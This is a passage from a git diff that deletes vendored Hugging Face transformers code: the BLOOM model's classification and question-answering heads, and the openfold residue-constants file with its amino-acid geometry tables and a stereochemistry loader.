loss_fct(pooled_logits.squeeze(), labels.squeeze()) - else: - loss = loss_fct(pooled_logits, labels) - elif self.config.problem_type == "single_label_classification": - loss_fct = CrossEntropyLoss() - loss = loss_fct(pooled_logits, labels) - elif self.config.problem_type == "multi_label_classification": - loss_fct = BCEWithLogitsLoss() - loss = loss_fct(pooled_logits, labels) - if not return_dict: - output = (pooled_logits,) + transformer_outputs[1:] - return ((loss,) + output) if loss is not None else output - - return SequenceClassifierOutputWithPast( - loss=loss, - logits=pooled_logits, - past_key_values=transformer_outputs.past_key_values, - hidden_states=transformer_outputs.hidden_states, - attentions=transformer_outputs.attentions, - ) - - -@add_start_docstrings( - """ - Bloom Model with a token classification head on top (a linear layer on top of the hidden-states output) e.g. for - Named-Entity-Recognition (NER) tasks. - """, - BLOOM_START_DOCSTRING, -) -class BloomForTokenClassification(BloomPreTrainedModel): - def __init__(self, config: BloomConfig): - super().__init__(config) - self.num_labels = config.num_labels - - self.transformer = BloomModel(config) - if hasattr(config, "classifier_dropout") and config.classifier_dropout is not None: - classifier_dropout = config.classifier_dropout - elif hasattr(config, "hidden_dropout") and config.hidden_dropout is not None: - classifier_dropout = config.hidden_dropout - else: - classifier_dropout = 0.1 - self.dropout = nn.Dropout(classifier_dropout) - self.classifier = nn.Linear(config.hidden_size, config.num_labels) - - # Initialize weights and apply final processing - self.post_init() - - @add_start_docstrings_to_model_forward(BLOOM_INPUTS_DOCSTRING) - @add_code_sample_docstrings( - checkpoint=_CHECKPOINT_FOR_DOC, - output_type=TokenClassifierOutput, - config_class=_CONFIG_FOR_DOC, - ) - def forward( - self, - input_ids: Optional[torch.LongTensor] = None, - past_key_values: Optional[Tuple[Tuple[torch.Tensor, torch.Tensor], ...]] = None, - attention_mask: Optional[torch.Tensor] = None, - head_mask: Optional[torch.Tensor] = None, - inputs_embeds: Optional[torch.Tensor] = None, - labels: Optional[torch.Tensor] = None, - use_cache: Optional[bool] = None, - output_attentions: Optional[bool] = None, - output_hidden_states: Optional[bool] = None, - return_dict: Optional[bool] = None, - **deprecated_arguments, - ) -> Union[Tuple[torch.Tensor], TokenClassifierOutput]: - r""" - labels (`torch.LongTensor` of shape `(batch_size,)`, *optional*): - Labels for computing the sequence classification/regression loss. Indices should be in `[0, ..., - config.num_labels - 1]`. If `config.num_labels == 1` a regression loss is computed (Mean-Square loss), If - `config.num_labels > 1` a classification loss is computed (Cross-Entropy). - """ - if deprecated_arguments.pop("position_ids", False) is not False: - # `position_ids` could have been `torch.Tensor` or `None` so defaulting pop to `False` allows to detect if users were passing explicitly `None` - warnings.warn( - "`position_ids` have no functionality in BLOOM and will be removed in v5.0.0. You can safely ignore" - " passing `position_ids`.", - FutureWarning, - ) - if len(deprecated_arguments) > 0: - raise ValueError(f"Got unexpected arguments: {deprecated_arguments}") - - return_dict = return_dict if return_dict is not None else self.config.use_return_dict - - transformer_outputs = self.transformer( - input_ids, - past_key_values=past_key_values, - attention_mask=attention_mask, - head_mask=head_mask, - inputs_embeds=inputs_embeds, - use_cache=use_cache, - output_attentions=output_attentions, - output_hidden_states=output_hidden_states, - return_dict=return_dict, - ) - - hidden_states = transformer_outputs[0] - hidden_states = self.dropout(hidden_states) - logits = self.classifier(hidden_states) - - loss = None - if labels is not None: - # move labels to correct device to enable model parallelism - labels = labels.to(logits.device) - batch_size, seq_length = labels.shape - loss_fct = CrossEntropyLoss() - loss = loss_fct( - logits.view(batch_size * seq_length, self.num_labels), labels.view(batch_size * seq_length) - ) - - if not return_dict: - output = (logits,) + transformer_outputs[2:] - return ((loss,) + output) if loss is not None else output - - return TokenClassifierOutput( - loss=loss, - logits=logits, - hidden_states=transformer_outputs.hidden_states, - attentions=transformer_outputs.attentions, - ) - - -@add_start_docstrings( - """ - The BLOOM Model transformer with a span classification head on top for extractive question-answering tasks like - SQuAD (a linear layers on top of the hidden-states output to compute `span start logits` and `span end logits`). - """, - BLOOM_START_DOCSTRING, -) -class BloomForQuestionAnswering(BloomPreTrainedModel): - def __init__(self, config): - super().__init__(config) - self.transformer = BloomModel(config) - self.qa_outputs = nn.Linear(config.hidden_size, 2) - - # Initialize weights and apply final processing - self.post_init() - - @add_start_docstrings_to_model_forward(BLOOM_INPUTS_DOCSTRING.format("batch_size, sequence_length")) - def forward( - self, - input_ids: Optional[torch.LongTensor] = None, - attention_mask: Optional[torch.FloatTensor] = None, - position_ids: Optional[torch.LongTensor] = None, - head_mask: Optional[torch.FloatTensor] = None, - inputs_embeds: Optional[torch.FloatTensor] = None, - start_positions: Optional[torch.LongTensor] = None, - end_positions: Optional[torch.LongTensor] = None, - output_attentions: Optional[bool] = None, - output_hidden_states: Optional[bool] = None, - return_dict: Optional[bool] = None, - ) -> Union[Tuple, QuestionAnsweringModelOutput]: - r""" - start_positions (`torch.LongTensor` of shape `(batch_size,)`, *optional*): - Labels for position (index) of the start of the labelled span for computing the token classification loss. - Positions are clamped to the length of the sequence (`sequence_length`). Position outside of the sequence - are not taken into account for computing the loss. - end_positions (`torch.LongTensor` of shape `(batch_size,)`, *optional*): - Labels for position (index) of the end of the labelled span for computing the token classification loss. - Positions are clamped to the length of the sequence (`sequence_length`). Position outside of the sequence - are not taken into account for computing the loss. - """ - return_dict = return_dict if return_dict is not None else self.config.use_return_dict - - outputs = self.transformer( - input_ids, - attention_mask=attention_mask, - position_ids=position_ids, - head_mask=head_mask, - inputs_embeds=inputs_embeds, - output_attentions=output_attentions, - output_hidden_states=output_hidden_states, - return_dict=return_dict, - ) - - sequence_output = outputs[0] - - logits = self.qa_outputs(sequence_output) - start_logits, end_logits = logits.split(1, dim=-1) - start_logits = start_logits.squeeze(-1).contiguous() - end_logits = end_logits.squeeze(-1).contiguous() - - total_loss = None - if start_positions is not None and end_positions is not None: - # If we are on multi-GPU, split add a dimension - if len(start_positions.size()) > 1: - start_positions = start_positions.squeeze(-1) - if len(end_positions.size()) > 1: - end_positions = end_positions.squeeze(-1) - # sometimes the start/end positions are outside our model inputs, we ignore these terms - ignored_index = start_logits.size(1) - start_positions = start_positions.clamp(0, ignored_index) - end_positions = end_positions.clamp(0, ignored_index) - - loss_fct = CrossEntropyLoss(ignore_index=ignored_index) - start_loss = loss_fct(start_logits, start_positions) - end_loss = loss_fct(end_logits, end_positions) - total_loss = (start_loss + end_loss) / 2 - - if not return_dict: - output = (start_logits, end_logits) + outputs[2:] - return ((total_loss,) + output) if total_loss is not None else output - - return QuestionAnsweringModelOutput( - loss=total_loss, - start_logits=start_logits, - end_logits=end_logits, - hidden_states=outputs.hidden_states, - attentions=outputs.attentions, - ) diff --git a/spaces/yizhangliu/Grounded-Segment-Anything/transformers_4_35_0/models/esm/openfold_utils/residue_constants.py b/spaces/yizhangliu/Grounded-Segment-Anything/transformers_4_35_0/models/esm/openfold_utils/residue_constants.py deleted file mode 100644 index 8f0ad3b50c65050a4ffd4370e9b4f3a3312fc723..0000000000000000000000000000000000000000 --- a/spaces/yizhangliu/Grounded-Segment-Anything/transformers_4_35_0/models/esm/openfold_utils/residue_constants.py +++ /dev/null @@ -1,983 +0,0 @@ -# Copyright 2021 AlQuraishi Laboratory -# Copyright 2021 DeepMind Technologies Limited -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. - -"""Constants used in AlphaFold.""" - -import collections -import copy -import functools -from importlib import resources -from typing import Dict, List, Mapping, Sequence, Tuple - -import numpy as np - - -# Internal import (35fd). - - -# Distance from one CA to next CA [trans configuration: omega = 180]. -ca_ca = 3.80209737096 - -# Format: The list for each AA type contains chi1, chi2, chi3, chi4 in -# this order (or a relevant subset from chi1 onwards). ALA and GLY don't have -# chi angles so their chi angle lists are empty. -chi_angles_atoms: Dict[str, List[List[str]]] = { - "ALA": [], - # Chi5 in arginine is always 0 +- 5 degrees, so ignore it. - "ARG": [["N", "CA", "CB", "CG"], ["CA", "CB", "CG", "CD"], ["CB", "CG", "CD", "NE"], ["CG", "CD", "NE", "CZ"]], - "ASN": [["N", "CA", "CB", "CG"], ["CA", "CB", "CG", "OD1"]], - "ASP": [["N", "CA", "CB", "CG"], ["CA", "CB", "CG", "OD1"]], - "CYS": [["N", "CA", "CB", "SG"]], - "GLN": [["N", "CA", "CB", "CG"], ["CA", "CB", "CG", "CD"], ["CB", "CG", "CD", "OE1"]], - "GLU": [["N", "CA", "CB", "CG"], ["CA", "CB", "CG", "CD"], ["CB", "CG", "CD", "OE1"]], - "GLY": [], - "HIS": [["N", "CA", "CB", "CG"], ["CA", "CB", "CG", "ND1"]], - "ILE": [["N", "CA", "CB", "CG1"], ["CA", "CB", "CG1", "CD1"]], - "LEU": [["N", "CA", "CB", "CG"], ["CA", "CB", "CG", "CD1"]], - "LYS": [["N", "CA", "CB", "CG"], ["CA", "CB", "CG", "CD"], ["CB", "CG", "CD", "CE"], ["CG", "CD", "CE", "NZ"]], - "MET": [["N", "CA", "CB", "CG"], ["CA", "CB", "CG", "SD"], ["CB", "CG", "SD", "CE"]], - "PHE": [["N", "CA", "CB", "CG"], ["CA", "CB", "CG", "CD1"]], - "PRO": [["N", "CA", "CB", "CG"], ["CA", "CB", "CG", "CD"]], - "SER": [["N", "CA", "CB", "OG"]], - "THR": [["N", "CA", "CB", "OG1"]], - "TRP": [["N", "CA", "CB", "CG"], ["CA", "CB", "CG", "CD1"]], - "TYR": [["N", "CA", "CB", "CG"], ["CA", "CB", "CG", "CD1"]], - "VAL": [["N", "CA", "CB", "CG1"]], -} - -# If chi angles given in fixed-length array, this matrix determines how to mask -# them for each AA type. The order is as per restype_order (see below). -chi_angles_mask: List[List[float]] = [ - [0.0, 0.0, 0.0, 0.0], # ALA - [1.0, 1.0, 1.0, 1.0], # ARG - [1.0, 1.0, 0.0, 0.0], # ASN - [1.0, 1.0, 0.0, 0.0], # ASP - [1.0, 0.0, 0.0, 0.0], # CYS - [1.0, 1.0, 1.0, 0.0], # GLN - [1.0, 1.0, 1.0, 0.0], # GLU - [0.0, 0.0, 0.0, 0.0], # GLY - [1.0, 1.0, 0.0, 0.0], # HIS - [1.0, 1.0, 0.0, 0.0], # ILE - [1.0, 1.0, 0.0, 0.0], # LEU - [1.0, 1.0, 1.0, 1.0], # LYS - [1.0, 1.0, 1.0, 0.0], # MET - [1.0, 1.0, 0.0, 0.0], # PHE - [1.0, 1.0, 0.0, 0.0], # PRO - [1.0, 0.0, 0.0, 0.0], # SER - [1.0, 0.0, 0.0, 0.0], # THR - [1.0, 1.0, 0.0, 0.0], # TRP - [1.0, 1.0, 0.0, 0.0], # TYR - [1.0, 0.0, 0.0, 0.0], # VAL -] - -# The following chi angles are pi periodic: they can be rotated by a multiple -# of pi without affecting the structure. -chi_pi_periodic: List[List[float]] = [ - [0.0, 0.0, 0.0, 0.0], # ALA - [0.0, 0.0, 0.0, 0.0], # ARG - [0.0, 0.0, 0.0, 0.0], # ASN - [0.0, 1.0, 0.0, 0.0], # ASP - [0.0, 0.0, 0.0, 0.0], # CYS - [0.0, 0.0, 0.0, 0.0], # GLN - [0.0, 0.0, 1.0, 0.0], # GLU - [0.0, 0.0, 0.0, 0.0], # GLY - [0.0, 0.0, 0.0, 0.0], # HIS - [0.0, 0.0, 0.0, 0.0], # ILE - [0.0, 0.0, 0.0, 0.0], # LEU - [0.0, 0.0, 0.0, 0.0], # LYS - [0.0, 0.0, 0.0, 0.0], # MET - [0.0, 1.0, 0.0, 0.0], # PHE - [0.0, 0.0, 0.0, 0.0], # PRO - [0.0, 0.0, 0.0, 0.0], # SER - [0.0, 0.0, 0.0, 0.0], # THR - [0.0, 0.0, 0.0, 0.0], # TRP - [0.0, 1.0, 0.0, 0.0], # TYR - [0.0, 0.0, 0.0, 0.0], # VAL - [0.0, 0.0, 0.0, 0.0], # UNK -] - -# Atoms positions relative to the 8 rigid groups, defined by the pre-omega, phi, -# psi and chi angles: -# 0: 'backbone group', -# 1: 'pre-omega-group', (empty) -# 2: 'phi-group', (currently empty, because it defines only hydrogens) -# 3: 'psi-group', -# 4,5,6,7: 'chi1,2,3,4-group' -# The atom positions are relative to the axis-end-atom of the corresponding -# rotation axis. The x-axis is in direction of the rotation axis, and the y-axis -# is defined such that the dihedral-angle-definiting atom (the last entry in -# chi_angles_atoms above) is in the xy-plane (with a positive y-coordinate). -# format: [atomname, group_idx, rel_position] -rigid_group_atom_positions: Dict[str, List[Tuple[str, int, Tuple[float, float, float]]]] = { - "ALA": [ - ("N", 0, (-0.525, 1.363, 0.000)), - ("CA", 0, (0.000, 0.000, 0.000)), - ("C", 0, (1.526, -0.000, -0.000)), - ("CB", 0, (-0.529, -0.774, -1.205)), - ("O", 3, (0.627, 1.062, 0.000)), - ], - "ARG": [ - ("N", 0, (-0.524, 1.362, -0.000)), - ("CA", 0, (0.000, 0.000, 0.000)), - ("C", 0, (1.525, -0.000, -0.000)), - ("CB", 0, (-0.524, -0.778, -1.209)), - ("O", 3, (0.626, 1.062, 0.000)), - ("CG", 4, (0.616, 1.390, -0.000)), - ("CD", 5, (0.564, 1.414, 0.000)), - ("NE", 6, (0.539, 1.357, -0.000)), - ("NH1", 7, (0.206, 2.301, 0.000)), - ("NH2", 7, (2.078, 0.978, -0.000)), - ("CZ", 7, (0.758, 1.093, -0.000)), - ], - "ASN": [ - ("N", 0, (-0.536, 1.357, 0.000)), - ("CA", 0, (0.000, 0.000, 0.000)), - ("C", 0, (1.526, -0.000, -0.000)), - ("CB", 0, (-0.531, -0.787, -1.200)), - ("O", 3, (0.625, 1.062, 0.000)), - ("CG", 4, (0.584, 1.399, 0.000)), - ("ND2", 5, (0.593, -1.188, 0.001)), - ("OD1", 5, (0.633, 1.059, 0.000)), - ], - "ASP": [ - ("N", 0, (-0.525, 1.362, -0.000)), - ("CA", 0, (0.000, 0.000, 0.000)), - ("C", 0, (1.527, 0.000, -0.000)), - ("CB", 0, (-0.526, -0.778, -1.208)), - ("O", 3, (0.626, 1.062, -0.000)), - ("CG", 4, (0.593, 1.398, -0.000)), - ("OD1", 5, (0.610, 1.091, 0.000)), - ("OD2", 5, (0.592, -1.101, -0.003)), - ], - "CYS": [ - ("N", 0, (-0.522, 1.362, -0.000)), - ("CA", 0, (0.000, 0.000, 0.000)), - ("C", 0, (1.524, 0.000, 0.000)), - ("CB", 0, (-0.519, -0.773, -1.212)), - ("O", 3, (0.625, 1.062, -0.000)), - ("SG", 4, (0.728, 1.653, 0.000)), - ], - "GLN": [ - ("N", 0, (-0.526, 1.361, -0.000)), - ("CA", 0, (0.000, 0.000, 0.000)), - ("C", 0, (1.526, 0.000, 0.000)), - ("CB", 0, (-0.525, -0.779, -1.207)), - ("O", 3, (0.626, 1.062, -0.000)), - ("CG", 4, (0.615, 1.393, 0.000)), - ("CD", 5, (0.587, 1.399, -0.000)), - ("NE2", 6, (0.593, -1.189, -0.001)), - ("OE1", 6, (0.634, 1.060, 0.000)), - ], - "GLU": [ - ("N", 0, (-0.528, 1.361, 0.000)), - ("CA", 0, (0.000, 0.000, 0.000)), - ("C", 0, (1.526, -0.000, -0.000)), - ("CB", 0, (-0.526, -0.781, -1.207)), - ("O", 3, (0.626, 1.062, 0.000)), - ("CG", 4, (0.615, 1.392, 0.000)), - ("CD", 5, (0.600, 1.397, 0.000)), - ("OE1", 6, (0.607, 1.095, -0.000)), - ("OE2", 6, (0.589, -1.104, -0.001)), - ], - "GLY": [ - ("N", 0, (-0.572, 1.337, 0.000)), - ("CA", 0, (0.000, 0.000, 0.000)), - ("C", 0, (1.517, -0.000, -0.000)), - ("O", 3, (0.626, 1.062, -0.000)), - ], - "HIS": [ - ("N", 0, (-0.527, 1.360, 0.000)), - ("CA", 0, (0.000, 0.000, 0.000)), - ("C", 0, (1.525, 0.000, 0.000)), - ("CB", 0, (-0.525, -0.778, -1.208)), - ("O", 3, (0.625, 1.063, 0.000)), - ("CG", 4, (0.600, 1.370, -0.000)), - ("CD2", 5, (0.889, -1.021, 0.003)), - ("ND1", 5, (0.744, 1.160, -0.000)), - ("CE1", 5, (2.030, 0.851, 0.002)), - ("NE2", 5, (2.145, -0.466, 0.004)), - ], - "ILE": [ - ("N", 0, (-0.493, 1.373, -0.000)), - ("CA", 0, (0.000, 0.000, 0.000)), - ("C", 0, (1.527, -0.000, -0.000)), - ("CB", 0, (-0.536, -0.793, -1.213)), - ("O", 3, (0.627, 1.062, -0.000)), - ("CG1", 4, (0.534, 1.437, -0.000)), - ("CG2", 4, (0.540, -0.785, -1.199)), - ("CD1", 5, (0.619, 1.391, 0.000)), - ], - "LEU": [ - ("N", 0, (-0.520, 1.363, 0.000)), - ("CA", 0, (0.000, 0.000, 0.000)), - ("C", 0, (1.525, -0.000, -0.000)), - ("CB", 0, (-0.522, -0.773, -1.214)), - ("O", 3, (0.625, 1.063, -0.000)), - ("CG", 4, (0.678, 1.371, 0.000)), - ("CD1", 5, (0.530, 1.430, -0.000)), - ("CD2", 5, (0.535, -0.774, 1.200)), - ], - "LYS": [ - ("N", 0, (-0.526, 1.362, -0.000)), - ("CA", 0, (0.000, 0.000, 0.000)), - ("C", 0, (1.526, 0.000, 0.000)), - ("CB", 0, (-0.524, -0.778, -1.208)), - ("O", 3, (0.626, 1.062, -0.000)), - ("CG", 4, (0.619, 1.390, 0.000)), - ("CD", 5, (0.559, 1.417, 0.000)), - ("CE", 6, (0.560, 1.416, 0.000)), - ("NZ", 7, (0.554, 1.387, 0.000)), - ], - "MET": [ - ("N", 0, (-0.521, 1.364, -0.000)), - ("CA", 0, (0.000, 0.000, 0.000)), - ("C", 0, (1.525, 0.000, 0.000)), - ("CB", 0, (-0.523, -0.776, -1.210)), - ("O", 3, (0.625, 1.062, -0.000)), - ("CG", 4, (0.613, 1.391, -0.000)), - ("SD", 5, (0.703, 1.695, 0.000)), - ("CE", 6, (0.320, 1.786, -0.000)), - ], - "PHE": [ - ("N", 0, (-0.518, 1.363, 0.000)), - ("CA", 0, (0.000, 0.000, 0.000)), - ("C", 0, (1.524, 0.000, -0.000)), - ("CB", 0, (-0.525, -0.776, -1.212)), - ("O", 3, (0.626, 1.062, -0.000)), - ("CG", 4, (0.607, 1.377, 0.000)), - ("CD1", 5, (0.709, 1.195, -0.000)), - ("CD2", 5, (0.706, -1.196, 0.000)), - ("CE1", 5, (2.102, 1.198, -0.000)), - ("CE2", 5, (2.098, -1.201, -0.000)), - ("CZ", 5, (2.794, -0.003, -0.001)), - ], - "PRO": [ - ("N", 0, (-0.566, 1.351, -0.000)), - ("CA", 0, (0.000, 0.000, 0.000)), - ("C", 0, (1.527, -0.000, 0.000)), - ("CB", 0, (-0.546, -0.611, -1.293)), - ("O", 3, (0.621, 1.066, 0.000)), - ("CG", 4, (0.382, 1.445, 0.0)), - # ('CD', 5, (0.427, 1.440, 0.0)), - ("CD", 5, (0.477, 1.424, 0.0)), # manually made angle 2 degrees larger - ], - "SER": [ - ("N", 0, (-0.529, 1.360, -0.000)), - ("CA", 0, (0.000, 0.000, 0.000)), - ("C", 0, (1.525, -0.000, -0.000)), - ("CB", 0, (-0.518, -0.777, -1.211)), - ("O", 3, (0.626, 1.062, -0.000)), - ("OG", 4, (0.503, 1.325, 0.000)), - ], - "THR": [ - ("N", 0, (-0.517, 1.364, 0.000)), - ("CA", 0, (0.000, 0.000, 0.000)), - ("C", 0, (1.526, 0.000, -0.000)), - ("CB", 0, (-0.516, -0.793, -1.215)), - ("O", 3, (0.626, 1.062, 0.000)), - ("CG2", 4, (0.550, -0.718, -1.228)), - ("OG1", 4, (0.472, 1.353, 0.000)), - ], - "TRP": [ - ("N", 0, (-0.521, 1.363, 0.000)), - ("CA", 0, (0.000, 0.000, 0.000)), - ("C", 0, (1.525, -0.000, 0.000)), - ("CB", 0, (-0.523, -0.776, -1.212)), - ("O", 3, (0.627, 1.062, 0.000)), - ("CG", 4, (0.609, 1.370, -0.000)), - ("CD1", 5, (0.824, 1.091, 0.000)), - ("CD2", 5, (0.854, -1.148, -0.005)), - ("CE2", 5, (2.186, -0.678, -0.007)), - ("CE3", 5, (0.622, -2.530, -0.007)), - ("NE1", 5, (2.140, 0.690, -0.004)), - ("CH2", 5, (3.028, -2.890, -0.013)), - ("CZ2", 5, (3.283, -1.543, -0.011)), - ("CZ3", 5, (1.715, -3.389, -0.011)), - ], - "TYR": [ - ("N", 0, (-0.522, 1.362, 0.000)), - ("CA", 0, (0.000, 0.000, 0.000)), - ("C", 0, (1.524, -0.000, -0.000)), - ("CB", 0, (-0.522, -0.776, -1.213)), - ("O", 3, (0.627, 1.062, -0.000)), - ("CG", 4, (0.607, 1.382, -0.000)), - ("CD1", 5, (0.716, 1.195, -0.000)), - ("CD2", 5, (0.713, -1.194, -0.001)), - ("CE1", 5, (2.107, 1.200, -0.002)), - ("CE2", 5, (2.104, -1.201, -0.003)), - ("OH", 5, (4.168, -0.002, -0.005)), - ("CZ", 5, (2.791, -0.001, -0.003)), - ], - "VAL": [ - ("N", 0, (-0.494, 1.373, -0.000)), - ("CA", 0, (0.000, 0.000, 0.000)), - ("C", 0, (1.527, -0.000, -0.000)), - ("CB", 0, (-0.533, -0.795, -1.213)), - ("O", 3, (0.627, 1.062, -0.000)), - ("CG1", 4, (0.540, 1.429, -0.000)), - ("CG2", 4, (0.533, -0.776, 1.203)), - ], -} - -# A list of atoms (excluding hydrogen) for each AA type. PDB naming convention. -residue_atoms: Dict[str, List[str]] = { - "ALA": ["C", "CA", "CB", "N", "O"], - "ARG": ["C", "CA", "CB", "CG", "CD", "CZ", "N", "NE", "O", "NH1", "NH2"], - "ASP": ["C", "CA", "CB", "CG", "N", "O", "OD1", "OD2"], - "ASN": ["C", "CA", "CB", "CG", "N", "ND2", "O", "OD1"], - "CYS": ["C", "CA", "CB", "N", "O", "SG"], - "GLU": ["C", "CA", "CB", "CG", "CD", "N", "O", "OE1", "OE2"], - "GLN": ["C", "CA", "CB", "CG", "CD", "N", "NE2", "O", "OE1"], - "GLY": ["C", "CA", "N", "O"], - "HIS": ["C", "CA", "CB", "CG", "CD2", "CE1", "N", "ND1", "NE2", "O"], - "ILE": ["C", "CA", "CB", "CG1", "CG2", "CD1", "N", "O"], - "LEU": ["C", "CA", "CB", "CG", "CD1", "CD2", "N", "O"], - "LYS": ["C", "CA", "CB", "CG", "CD", "CE", "N", "NZ", "O"], - "MET": ["C", "CA", "CB", "CG", "CE", "N", "O", "SD"], - "PHE": ["C", "CA", "CB", "CG", "CD1", "CD2", "CE1", "CE2", "CZ", "N", "O"], - "PRO": ["C", "CA", "CB", "CG", "CD", "N", "O"], - "SER": ["C", "CA", "CB", "N", "O", "OG"], - "THR": ["C", "CA", "CB", "CG2", "N", "O", "OG1"], - "TRP": ["C", "CA", "CB", "CG", "CD1", "CD2", "CE2", "CE3", "CZ2", "CZ3", "CH2", "N", "NE1", "O"], - "TYR": ["C", "CA", "CB", "CG", "CD1", "CD2", "CE1", "CE2", "CZ", "N", "O", "OH"], - "VAL": ["C", "CA", "CB", "CG1", "CG2", "N", "O"], -} - -# Naming swaps for ambiguous atom names. -# Due to symmetries in the amino acids the naming of atoms is ambiguous in -# 4 of the 20 amino acids. -# (The LDDT paper lists 7 amino acids as ambiguous, but the naming ambiguities -# in LEU, VAL and ARG can be resolved by using the 3d constellations of -# the 'ambiguous' atoms and their neighbours) -# TODO: ^ interpret this -residue_atom_renaming_swaps: Dict[str, Dict[str, str]] = { - "ASP": {"OD1": "OD2"}, - "GLU": {"OE1": "OE2"}, - "PHE": {"CD1": "CD2", "CE1": "CE2"}, - "TYR": {"CD1": "CD2", "CE1": "CE2"}, -} - -# Van der Waals radii [Angstroem] of the atoms (from Wikipedia) -van_der_waals_radius: Dict[str, float] = { - "C": 1.7, - "N": 1.55, - "O": 1.52, - "S": 1.8, -} - -Bond = collections.namedtuple("Bond", ["atom1_name", "atom2_name", "length", "stddev"]) -BondAngle = collections.namedtuple( - "BondAngle", - ["atom1_name", "atom2_name", "atom3name", "angle_rad", "stddev"], -) - - -def map_structure_with_atom_order(in_list: list, first_call: bool = True) -> list: - # Maps strings in a nested list structure to their corresponding index in atom_order - if first_call: - in_list = copy.deepcopy(in_list) - for i in range(len(in_list)): - if isinstance(in_list[i], list): - in_list[i] = map_structure_with_atom_order(in_list[i], first_call=False) - elif isinstance(in_list[i], str): - in_list[i] = atom_order[in_list[i]] - else: - raise ValueError("Unexpected type when mapping nested lists!") - return in_list - - -@functools.lru_cache(maxsize=None) -def load_stereo_chemical_props() -> ( - Tuple[ - Mapping[str, List[Bond]], - Mapping[str, List[Bond]], - Mapping[str, List[BondAngle]], - ] -): - """Load stereo_chemical_props.txt into a nice structure. - - Load literature values for bond lengths and bond angles and translate bond angles into the length of the opposite - edge of the triangle ("residue_virtual_bonds"). - - Returns: - residue_bonds: dict that maps resname --> list of Bond tuples residue_virtual_bonds: dict that maps resname --> - list of Bond tuples residue_bond_angles: dict that maps resname --> list of BondAngle tuples - """ - # TODO: this file should be downloaded in a setup script - stereo_chemical_props = resources.read_text("openfold.resources", "stereo_chemical_props.txt") - - lines_iter = iter(stereo_chemical_props.splitlines()) - # Load bond lengths. - residue_bonds: Dict[str, List[Bond]] = {} - next(lines_iter) # Skip header line. - for line in lines_iter: - if line.strip() == "-": - break - bond, resname, bond_length, stddev = line.split() - atom1, atom2 = bond.split("-") - if resname not in residue_bonds: - residue_bonds[resname] = [] - residue_bonds[resname].append(Bond(atom1, atom2, float(bond_length), float(stddev))) - residue_bonds["UNK"] = [] - - # Load bond angles. - residue_bond_angles: Dict[str, List[BondAngle]] = {} - next(lines_iter) # Skip empty line. - next(lines_iter) # Skip header line. - for line in lines_iter: - if line.strip() == "-": - break - bond, resname, angle_degree, stddev_degree = line.split() - atom1, atom2, atom3 = bond.split("-") - if resname not in residue_bond_angles: - residue_bond_angles[resname] = [] - residue_bond_angles[resname].append( - BondAngle( - atom1, - atom2, - atom3, - float(angle_degree) / 180.0 * np.pi, - float(stddev_degree) / 180.0 * np.pi, - ) - ) - residue_bond_angles["UNK"] = [] - - def make_bond_key(atom1_name: str, atom2_name: str) -> str: - """Unique key to lookup bonds.""" - return "-".join(sorted([atom1_name, atom2_name])) - - # Translate bond angles into distances ("virtual bonds"). - residue_virtual_bonds: Dict[str, List[Bond]] = {} - for resname, bond_angles in residue_bond_angles.items(): - # Create a fast lookup dict for bond lengths. - bond_cache: Dict[str, Bond] = {} - for b in residue_bonds[resname]: - bond_cache[make_bond_key(b.atom1_name, b.atom2_name)] = b - residue_virtual_bonds[resname] = [] - for ba in bond_angles: - bond1 = bond_cache[make_bond_key(ba.atom1_name, ba.atom2_name)] - bond2 = bond_cache[make_bond_key(ba.atom2_name, ba.atom3name)] - - # Compute distance between atom1 and atom3 using the law of cosines - # c^2 = a^2 + b^2 - 2ab*cos(gamma). - gamma = ba.angle_rad - length = np.sqrt(bond1.length**2 + bond2.length**2 - 2 * bond1.length * bond2.length * np.cos(gamma)) - - # Propagation of uncertainty assuming uncorrelated errors. - dl_outer = 0.5 / length - dl_dgamma = (2 * bond1.length * bond2.length * np.sin(gamma)) * dl_outer - dl_db1 = (2 * bond1.length - 2 * bond2.length * np.cos(gamma)) * dl_outer - dl_db2 = (2 * bond2.length - 2 * bond1.length * np.cos(gamma)) * dl_outer - stddev = np.sqrt( - (dl_dgamma * ba.stddev) ** 2 + (dl_db1 * bond1.stddev) ** 2 + (dl_db2 * bond2.stddev) ** 2 - ) - residue_virtual_bonds[resname].append(Bond(ba.atom1_name, ba.atom3name, length, stddev)) - - return (residue_bonds, residue_virtual_bonds, residue_bond_angles) - - -# Between-residue bond lengths for general bonds (first element) and for Proline -# (second element). -between_res_bond_length_c_n: Tuple[float, float] = (1.329, 1.341) -between_res_bond_length_stddev_c_n: Tuple[float, float] = (0.014, 0.016) - -# Between-residue cos_angles. -between_res_cos_angles_c_n_ca: Tuple[float, float] = (-0.5203, 0.0353) # degrees: 121.352 +- 2.315 -between_res_cos_angles_ca_c_n: Tuple[float, float] = (-0.4473, 0.0311) # degrees: 116.568 +- 1.995 - -# This mapping is used when we need to store atom data in a format that requires -# fixed atom data size for every residue (e.g. a numpy array). -atom_types: List[str] = [ - "N", - "CA", - "C", - "CB", - "O", - "CG", - "CG1", - "CG2", - "OG", - "OG1", - "SG", - "CD", - "CD1", - "CD2", - "ND1", - "ND2", - "OD1", - "OD2", - "SD", - "CE", - "CE1", - "CE2", - "CE3", - "NE", - "NE1", - "NE2", - "OE1", - "OE2", - "CH2", - "NH1", - "NH2", - "OH", - "CZ", - "CZ2", - "CZ3", - "NZ", - "OXT", -] -atom_order: Dict[str, int] = {atom_type: i for i, atom_type in enumerate(atom_types)} -atom_type_num = len(atom_types) # := 37. - -# A compact atom encoding with 14 columns -# pylint: disable=line-too-long -# pylint: disable=bad-whitespace -restype_name_to_atom14_names: Dict[str, List[str]] = { - "ALA": ["N", "CA", "C", "O", "CB", "", "", "", "", "", "", "", "", ""], - "ARG": ["N", "CA", "C", "O", "CB", "CG", "CD", "NE", "CZ", "NH1", "NH2", "", "", ""], - "ASN": ["N", "CA", "C", "O", "CB", "CG", "OD1", "ND2", "", "", "", "", "", ""], - "ASP": ["N", "CA", "C", "O", "CB", "CG", "OD1", "OD2", "", "", "", "", "", ""], - "CYS": ["N", "CA", "C", "O", "CB", "SG", "", "", "", "", "", "", "", ""], - "GLN": ["N", "CA", "C", "O", "CB", "CG", "CD", "OE1", "NE2", "", "", "", "", ""], - "GLU": ["N", "CA", "C", "O", "CB", "CG", "CD", "OE1", 